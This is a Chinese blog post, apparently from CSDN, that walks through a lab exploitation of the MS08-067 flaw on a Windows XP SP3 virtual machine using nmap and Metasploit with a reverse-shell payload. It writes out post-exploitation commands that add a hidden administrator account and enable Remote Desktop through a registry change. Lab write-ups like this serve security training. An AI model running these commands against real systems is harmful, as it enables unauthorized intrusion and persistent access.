#windowsxpsp3系统MS08-067漏洞测试

最新推荐文章于 2023-03-25 16:32:39 发布
最新推荐文章于 2023-03-25 16:32:39 发布
阅读量628 收藏 3
点赞数 1
文章标签: 安全 windows 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmxch/article/details/113180990
版权

#windowsxpsp3系统MS08-067漏洞测试

漏洞描述
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求,则该漏洞可能允许远程执行代码,在Windows 2000、Windows server 2003系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。
Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。
实验环境(虚拟机搭建)
目标主机:winxpsp3英文版:192.168.28.133
攻击主机:kaililinux:192.168.28.134

攻击过程

先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

进入metasploit框架
Msfconsole

搜索漏洞
Search ms08-067选择一个攻击模块

查看配置信息并设置
在这里插入图片描述

设置要攻击的目标主机ip
在这里插入图片描述

设置自己的ip地址,用于目标机器反弹shell
在这里插入图片描述

设置payload 用于反弹shell,这里是windows的

在这里插入图片描述

开始攻击
Expolit/run

在这里插入图片描述

一些命令

在这里插入图片描述

后渗透利用
Getuid
在这里插入图片描述

Shell

在这里插入图片描述

net user ouyang 123456 /add
在这里插入图片描述

net localgroup administrators ouyang /add
在这里插入图片描述

创建用户完毕后,打开3389远程桌面连接端口
echo reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

在这里插入图片描述

查看机器是否打开了3389
在这里插入图片描述

远程桌面连接

在这里插入图片描述

链接成功
在这里插入图片描述

获取完信息之后删除用户
在这里插入图片描述

白帽小丑
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Windows XP SP3(MS08-067漏洞复现及利用)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-01 2088
把以前做的实验和写在有道云里的笔记整理下,放到CSDN上 一、实验环境 靶机:Windows XP SP3 专业版(关闭Windows自带的防火墙!!!) 攻击机:Kali Linux 2020 靶机IP : 192.168.204.131 攻击机IP:192.168.204.128 二、漏洞利用 msf5 > search ms08-067 Matching Modules ================ # Name D
基于Windows XP SP3系统MS08067漏洞攻击
Lorezon的博客
11-21 1735
0x00 写在前面 MS08_067是一个很经典的漏洞,是我了解网安时候接触到的第一个漏洞。只不过那时候什么都不懂。其实很久之前就想写一篇08067漏洞,但是靶机一直有问题,就一直在拖延。现在终于有机会了。不多说,直接搞。 0x01扫描漏洞 0x02启用msf,查找08067 0x03利用模块 0x04 show payloads查找攻击载荷 可以看到有很多的载荷,我们选用返回shell...
#windowsxpsp3系统MS12-020漏洞测试
bmxch的博客
01-20 413
#windowsxpsp3系统MS12-020漏洞测试 漏洞描述: MS12-020 全称为“远程桌面协议RDP远程代码执行漏洞”,RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统蓝屏。 影响环境 Windows 2000、WindowsXPWindows server 2003、Windows Vista、Windows server 2008、Windows7
WIN xp sp3 系统Ms08_067_netapi漏洞利用
欢迎来到神林的博客
01-24 8563
Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限; 1:准备工作:WINxp sp3 系统(无补丁) 下载地址: http://blog.csdn.net/sql_injection/article/details/47683419 攻击kali ip:192.168.243.133 靶机 ip :192.168.243
Kail之MSF渗透测试--MS08-067
m0_57485346的博客
02-13 1430
MS08-067
WindowsXPsp3系统还原文件
04-26
Windows XP Service Pack 3(SP3)是微软公司对Windows XP操作系统进行的最后一次重大更新,旨在提高系统的稳定性和安全性。这个系统还原文件是为已经安装了Windows XP SP3的用户准备的,目的是在系统出现问题或者受...
苹果MAC笔记本怎么安装windowsXPSP3系统全程图解.pdf
11-11
- 选择你的USB驱动器,然后选择“格式化”选项,格式化为MS-DOS (FAT)文件系统,确保Windows能识别。 - 将ISO镜像文件刻录到USB驱动器,或者如果你有物理光盘,可以跳过这一步。 3. **启动Boot Camp**: - 打开...
windowsxpsp3系统下IIS文件安装包
01-11
总的来说,"windowsxpsp3系统下IIS文件安装包"涉及到的内容广泛,涵盖了IIS的安装、配置、管理、安全、性能优化等多个方面,对于使用Windows XP SP3作为服务器操作系统的用户来说,是非常关键的资源。
WINDOWSXPSP3的IIS组件提取自WINDOWSXPSP3
12-15
标题"WINDOWSXPSP3的IIS组件提取自WINDOWSXPSP3"指出,这个压缩包包含了源自Windows XP Service Pack 3 (SP3) 操作系统的Internet Information Services (IIS) 组件。IIS是微软开发的一款用于Windows平台的Web服务器...
WindowsXPSP3下的IIS6.0安装包
10-10
Windows XP Service Pack 3(SP3)是微软为 Windows XP 操作系统提供的最后一个重大更新,它包含了大量的安全改进、性能优化以及一些新功能。其中,IIS(Internet Information Services)6.0 是微软开发的一款强大的...
windows xp(sp3)的漏洞补丁
06-18
windows xp(sp3)的漏洞补丁
Windows XP操作系统安全漏洞大搜索(转)
csd3176的博客
08-11 329
Windows XP操作系统安全漏洞大搜索(转)[@more@]   现在很多的电脑用户都将自己的操作系统换成了最新的WINXP系统,但即使是最新的Windows系统,依然还是存在着很多安全隐患,那么怎样保证你的系统安全呢? ...
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
最新发布
qq_43093288的博客
03-25 1813
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,,但是我们现在只考虑ms08-067。注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101。
用metasploit来exploit虚拟机XPSP3ms08_067
天元喜羊羊的博客
04-11 4042
看到MS08-067: VULNERABLE,说明有漏洞 exploit失败,不知道原因。书里写着这样几句话:“这暗示我们或许能够对这台主机进行攻击。攻击是否成功取决于目标主机的操作系统版本、安装的服务包版本以及语言类型,同时还依赖于是否成功地绕过了数据执行保护DEP。” 我想可能没有成功绕过DEP吧。
ms08-067漏洞 远程溢出入侵测试
热门推荐
十年磨一剑,霜刃未曾试!
09-25 3万+
被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English 攻击者IP地址:192.168.9.1   //查看数据库连接状态 msf > db_status [*] postgresql connected to msf3 //使用nmap扫描目标机器 msf > db_nmap -sS -sV -O --script=smb-check...
#windowsxpsp3系统MS10-046漏洞测试
bmxch的博客
01-24 564
一、影响环境 Windows 2000、WindowsXPWindows server 2003、Windows Vista、Windows server 2008、Windows7 beta。 **二、**实验环境(虚拟机搭建) 目标主机:winxpsp3英文版:192.168.28.133 攻击主机:kaililinux:192.168.28.134 三、攻击过程 先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活 进入metasploit框架 Msfcons
MS08-067漏洞分析与复现
qq_43443410的博客
07-30 2489
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据.
MS08-067漏洞渗透测试
forget_mt的博客
03-28 9570
提示:靶机 windows XP IP:172.16.5.27 攻击机 kali IP:172.16.5.28 文章目录 前言 漏洞介绍 nmap扫描 MS08-067利用 总结 前言 利用msfconsole控制台的exploit/windows/smb/ms08_067_netapi攻击模块对靶机445端口的攻击过程,成功进入后渗透,开启靶机的3389远程登录 漏洞介绍: ms08_067漏洞是的著名...
WindowsXP SP3 AFD.sys 本地拒绝服务漏洞的挖掘过程
Less Is More
05-28 5690
标 题: WindowsXP SP3 AFD.sys 本地拒绝服务漏洞的挖掘过程 时 间: 2013-03-17,15:22:33 这是本人第一次做漏洞挖掘,2月的时候开始研究漏洞挖掘技术,2月24号那天在进行Fuzz测试的时候偶然的发现了一个afd.sys未处理的异常,然后就对这个异常如获至宝的分析起来了,因为在上班,所以都是利用周末时间来进行,前前后后到加起来差不多5天时间。现在这个漏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽小丑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值